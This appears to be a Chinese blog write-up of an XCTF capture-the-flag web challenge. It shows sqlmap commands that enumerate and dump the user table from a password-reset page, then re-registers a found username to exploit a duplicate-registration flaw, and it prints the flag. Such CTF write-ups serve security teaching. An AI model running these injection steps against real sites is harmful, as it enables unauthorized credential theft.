难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、先注册几个账号,相同的用户名
3、登录—>忘记密码
4、忘记密码
5、在kail Linux 里,开始sql注入
执行如下:
5.1
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" ‐dbs5.2
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 - -tables5.3
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user - -columns5.4
sqlmap ‐u "http://220.249.52.133:52962/findpwd.php" ‐‐data "username=1" -D cetc004 -T user -C "username,password" - -dump5.5 OK
有一个没注册过的用户名:c3tlwDmIn23
其密码经过 md5 加密处理过,但这个用户的密码没有被解析出来。
6、看到有两个用户名为 yibodong,并且题目描述中说了注册页面有漏洞,再重复注册一个 c3tlwDmIn23 用户
7、登录—>flag就出来了
8、OK
cyberpeace{f3f54fb8f17053c68a7672794dae7e98}
艺博东 认证博客专家 网络 路由交换 微信公众号:艺博东关注后,回复关键字“简历”,即可领取简历模板大全,更多干货等你来领取。写作的初衷:学习、怕学了之后很快会忘记,所以及时的做总结,这样便于加深理解和记忆,也为其积累经验。博客专家,内容合伙人。